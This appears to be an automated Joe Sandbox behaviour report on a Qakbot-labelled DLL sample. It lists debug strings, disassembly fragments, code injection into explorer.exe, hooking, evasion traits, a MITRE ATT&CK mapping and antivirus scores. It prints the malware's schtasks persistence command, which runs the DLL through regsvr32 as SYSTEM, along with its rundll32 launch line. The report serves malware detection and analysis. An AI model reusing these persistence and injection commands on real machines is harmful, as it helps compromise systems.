Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb$ source: WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdbBa source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb) source: WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: regsvr32.pdbk source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb\|g source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp
Source:	Binary string: regsvr32.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: mpr.pdb7 source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdbd_ source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: amstream.pdb source: explorer.exe, 00000004.00000003.702172421.0000000005361000.00000004.00000001.sdmp, explorer.exe, 00000005.00000003.702205579.0000000004F11000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000000.716853295.0000000010001000.00000020.00020000.sdmp, regsvr32.exe, 00000017.00000000.923266428.0000000010001000.00000020.00020000.sdmp, ZBvNS77A7a.dll.5.dr
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb5 source: WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdbK source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: amstream.pdbGCTL source: explorer.exe, 00000004.00000003.702172421.0000000005361000.00000004.00000001.sdmp, explorer.exe, 00000005.00000003.702205579.0000000004F11000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000000.716853295.0000000010001000.00000020.00020000.sdmp, regsvr32.exe, 00000017.00000000.923266428.0000000010001000.00000020.00020000.sdmp, ZBvNS77A7a.dll.5.dr
Source:	Binary string: annjrqnCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000D.00000002.764287027.0000000002C32000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000002.938813664.0000000002962000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdbvm source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdbH{ source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_030944AB push edi; mov dword ptr [esp], 00000003h	0_2_030944FE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_030944AB push edx; mov dword ptr [esp], 00F00000h	0_2_03094507
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_030919A1 push 00000000h; mov dword ptr [esp], eax	0_2_03091C63
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_030919A1 push 00000000h; mov dword ptr [esp], edx	0_2_03091C89
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_030919A1 push 00000000h; mov dword ptr [esp], ecx	0_2_03091D27
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_030919A1 push ebp; mov dword ptr [esp], 000FFFFFh	0_2_03091EE2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001A006 push ebx; ret	0_2_1001A007
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001D485 push FFFFFF8Ah; iretd	0_2_1001D50E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001D4B6 push FFFFFF8Ah; iretd	0_2_1001D50E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10019D54 push cs; iretd	0_2_10019E2A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10019E56 push cs; iretd	0_2_10019E2A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001BB21 push esi; iretd	0_2_1001BB26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_045844AB push edi; mov dword ptr [esp], 00000003h	2_2_045844FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_045844AB push edx; mov dword ptr [esp], 00F00000h	2_2_04584507
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_045819A1 push 00000000h; mov dword ptr [esp], eax	2_2_04581C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_045819A1 push 00000000h; mov dword ptr [esp], edx	2_2_04581C89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_045819A1 push 00000000h; mov dword ptr [esp], ecx	2_2_04581D27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_045819A1 push ebp; mov dword ptr [esp], 000FFFFFh	2_2_04581EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1001A006 push ebx; ret	2_2_1001A007
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1001D485 push FFFFFF8Ah; iretd	2_2_1001D50E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1001D4B6 push FFFFFF8Ah; iretd	2_2_1001D50E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10019D54 push cs; iretd	2_2_10019E2A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10019E56 push cs; iretd	2_2_10019E2A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1001BB21 push esi; iretd	2_2_1001BB26
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0361BB21 push esi; iretd	4_2_0361BB26
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_03619E56 push cs; iretd	4_2_03619E2A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_03619D54 push cs; iretd	4_2_03619E2A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0361A006 push ebx; ret	4_2_0361A007
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0361D4B6 push FFFFFF8Ah; iretd	4_2_0361D50E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0361D485 push FFFFFF8Ah; iretd	4_2_0361D50E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00E6D4B6 push FFFFFF8Ah; iretd	5_2_00E6D50E

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1000DFB8 LoadLibraryA,GetProcAddress,

0_2_1000DFB8

Source: unknown

Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'

Persistence and Installation Behavior:

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\Desktop\ZBvNS77A7a.dll

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\SysWOW64\explorer.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Show sources

Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 5616 base: 10DF380 value: E9 4F 69 52 02			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 5620 base: 10DF380 value: E9 4F 69 D7 FF			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe TID: 4676	Thread sleep time: -100000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6616	Thread sleep count: 90 > 30			Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1000D02A GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,GetLastError,GetLastError,GetSystemMetrics,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,

0_2_1000D02A

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000AE9A FindFirstFileW,FindNextFileW,	0_2_1000AE9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1000AE9A FindFirstFileW,FindNextFileW,	2_2_1000AE9A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0360AE9A FindFirstFileW,FindNextFileW,	4_2_0360AE9A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00E5AE9A FindFirstFileW,FindNextFileW,	5_2_00E5AE9A

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1000DFB8 LoadLibraryA,GetProcAddress,

0_2_1000DFB8

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 4_2_03605A49 RtlAddVectoredExceptionHandler,

4_2_03605A49

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\System32\loaddll32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: E80000			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 10DF380			Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: C:\Windows\SysWOW64\explorer.exe base: E80000 protect: page read and write

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 5616 base: 33E0000 value: B8	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 5616 base: 347A2D8 value: 00	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 5616 base: 347B1E8 value: 00	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 5616 base: 33F0000 value: 9C	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 5616 base: 10DF380 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 5620 base: E80000 value: 9C	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 5620 base: 10DF380 value: E9	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: explorer.exe, 00000004.00000002.951903725.0000000003E50000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000002.951903725.0000000003E50000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.951903725.0000000003E50000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.951903725.0000000003E50000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 4_2_036031C2 CreateNamedPipeA,

4_2_036031C2

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_100097F2 GetSystemTimeAsFileTime,

0_2_100097F2

Source: C:\Windows\System32\loaddll32.exe

0_2_1000D02A

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection413	Masquerading11	Credential API Hooking1	System Time Discovery1	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	DLL Side-Loading1	Scheduled Task/Job1	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Process Injection413	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Process Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Regsvr321	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Rundll321	Cached Domain Credentials	System Information Discovery14	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ZBvNS77A7a.dll	46%	Virustotal		Browse
ZBvNS77A7a.dll	60%	ReversingLabs	Win32.Backdoor.Quakbot
ZBvNS77A7a.dll	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Desktop\ZBvNS77A7a.dll	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	490262
Start date:	25.09.2021
Start time:	10:22:02
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ZBvNS77A7a.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.evad.winDLL@20/10@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 22.6% (good quality ratio 21.6%) Quality average: 76.7% Quality standard deviation: 26.5%
HCA Information:	Successful, ratio: 74% Number of executed functions: 102 Number of non-executed functions: 95
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
